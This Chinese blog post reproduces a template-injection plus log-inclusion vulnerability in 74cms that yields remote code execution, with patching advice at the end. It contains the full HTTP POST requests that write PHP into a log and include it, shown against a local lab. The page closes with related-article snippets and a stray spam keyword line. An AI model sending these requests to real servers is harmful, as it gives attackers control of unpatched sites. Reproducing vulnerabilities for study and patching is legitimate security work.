<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    騎士CMS模版注入+文件包含getshell漏洞復現

    VSole2021-07-03 08:14:26

    一、騎士CMS簡介

    騎士人才系統,是一項基于 PHP+MYSQL 為核心開發的一套 免費+開源 專業人才招聘系統,使用了ThinkPHP框架(3.2.3);由太原迅易科技有限公司于2009年正式推出。為個人求職和企業招聘提供信息化解決方案, 騎士人才系統具備執行效率高、模板切換自由、后臺管理功能靈活、模塊功能強大等特點,自上線以來一直是職場人士、企業HR青睞的求職招聘平臺。

    經過7年的發展,騎士人才系統已成國內人才系統行業的排頭兵。系統應用涉及政府、企業、科研教育和媒體等行業領域,用戶已覆蓋國內所有省份和地區。2016年全新推出騎士人才系統基礎版,全新的“平臺+插件”體系,打造用戶“DIY”個性化功能定制,為眾多地方門戶、行業人才提供一個專業、穩定、方便的網絡招聘管理平臺,致力發展成為引領市場風向的優質高效的招聘軟件

    二、環境搭建

    此次采用

    windows10+Nginx+MySQL+PHP,使用phpstudy進行的環境配置,注意PHP版本最好使用 PHP 5.5及以上,MySQL版本 5.7.6及以上,我這里使用PHP版本5.4.45


    然后這里放一下騎士cms的下載鏈接:

    https://pan.hallolck.com/s/y06I6


    三、安裝過程

     

    四、漏洞概述

    官方公告地址


    http://www.74cms.com/news/show-2497.html
    

    /Application/Common/Controller/BaseController.class.php

    文件的assign_resume_tpl函數因為過濾不嚴格,導致了模板注入,可以進行遠程命令執行

    影響版本:騎士CMS < 6.0.48>

    五、漏洞復現

    寫入日志

    POST參數:

    http://your-ip/index.php?m=home&a=assign_resume_tplPOST:variable=1&tpl= phpinfo(); ob_flush();?>/r/n"info" 企業id="$_GET['id']"/>
    

    我們來POST一下看看

    POST /74cmsv6.0.20/upload/index.php?m=home&a=assign_resume_tpl HTTP/1.1Host: 192.168.1.6Content-Length: 98Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://192.168.1.6/74cmsv6.0.20/upload/index.php?m=home&a=assign_resume_tplDNT: 1Connection: closeCookie: PHPSESSID=vj12p9l3pnqkc09ostum5m7mfu; think_language=zh-CN; think_template=defaultUpgrade-Insecure-Requests: 1Cache-Control: max-age=0variable=1&tpl=/r/n
    

     可以看到返回了錯誤,日志已經記錄了

    我們來翻一下日志

    日志路徑: \upload\data\Runtime\Logs\Home
    

    成功寫入

    接下來我們嘗試包含日志,日志名稱就是測試當天的年月日

    包含日志

    POST參數:

    http://your-ip/index.php?m=home&a=assign_resume_tpl POST: variable=1&tpl=data/Runtime/Logs/Home/20_12_22.log
    

    我們來POST一下看看

    POST /74cmsv6.0.20/upload/index.php?m=home&a=assign_resume_tpl HTTP/1.1Host: 192.168.1.6Content-Length: 52Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://192.168.1.6/74cmsv6.0.20/upload/index.php?m=home&a=assign_resume_tplDNT: 1Connection: closeCookie: PHPSESSID=vj12p9l3pnqkc09ostum5m7mfu; think_language=zh-CN; think_template=defaultUpgrade-Insecure-Requests: 1Cache-Control: max-age=0
    variable=1&tpl=./data/Runtime/Logs/Home/21_07_01.log
    

    六、修復建議

    下載官方最新補丁包

    http://www.74cms.com/download/index.html
    
    騎士cms
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    騎士人才系統,是一項基于 PHP+MYSQL 為核心開發的一套 免費+開源 專業人才招聘系統,使用了ThinkPHP框架(3.2.3);由太原迅易科技有限公司于2009年正式推出。為個人求職和企業招聘提供信息化解決方案, 騎士人才系統具備執行效率高、模板切換自由、后臺管理功能靈活、模塊功能強大等特點,自上線以來一直是職場人士、企業HR青睞的求職招聘平臺。
    近日,阿里云應急響應中心監測到騎士CMS官方發布安全更新,修復了一處遠程代碼執行漏洞。由于騎士CMS某些函數存在過濾不嚴格,攻擊者通過構造惡意請求,配合文件包含漏洞可在無需登錄的情況下執行任意代碼,控制服務器。漏洞利用簡單,且相關利用細節已公開,阿里云應急響應中心提醒騎士CMS用戶盡快采取安全措施阻止漏洞攻擊。影響版本 騎士CMS < 安全版本 騎士CMS 安全建議 1. 升級騎士CMS至最新版本。
    起因是,朋友丟了個IP過來
    CMS漏洞合集
    2023-06-27 16:12:06
    2)contorl.php:對$_GET進行全局過濾危險的SQL函數。這個過濾從最簡單的角度來說,即mysql<8的情況下,把select禁用了,其實就沒辦法進行跨表查詢,SQL利用造成危害的可能性會大大降低,當然這是一種直接且無需考慮用戶體驗為原則的暴力做法,點到為止吧。回到web_inc.php,繼續閱讀,后面吸引我的地方,在于 89 line一處SQL語句的地方。
    細說從0開始挖掘cms-
    2022-08-17 16:26:57
    確立目標挖洞的第一步首先是確立一個目標,也就是找個cms來挖,這里可以通過github,gitee或者谷歌百度直接去搜cms。或者cnvd查看相應的信息,通過查看相應的信息可以提高我們挖洞的效率,我們從中可以知道該項目已經存在漏洞,我們到時候挖就可以看看相應的地方會不會還存在漏洞或者避免挖到別人挖過的漏洞。本次挖掘的漏洞是ofcms,首先先下載一下源碼,然后解壓丟一邊,回到網頁來看一下項目文檔。
    漏洞復現成功率加成......
    Lazarus又名APT38,是一個知名的朝鮮語APT組織。主要負責以獲得外匯為目的的攻擊。
    本文將對EmpireCMS(帝國cms)的漏洞進行分析及復現。代碼分析這一塊主要還是借鑒了大佬們的一些分析思想,這里對大佬們提供的思路表示衷心的感謝。
    通過找源碼代碼審計后getshell。測試在某次測試過程中發現,通過泄漏的md5進入后臺,在后臺配置中有處“上傳logo”的功能。會提示“上傳失敗”。只有正常圖片+圖片后綴 會返回圖片路徑。第一行 導入命名空間“phpWeChat” 內的 Upload 類,下面是引用包含一些文件。再往下,$action是用于下面 switch函數內做索引匹配而調用不同功能的。$action的值是通過 GET方式獲取 “action”參數的值。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类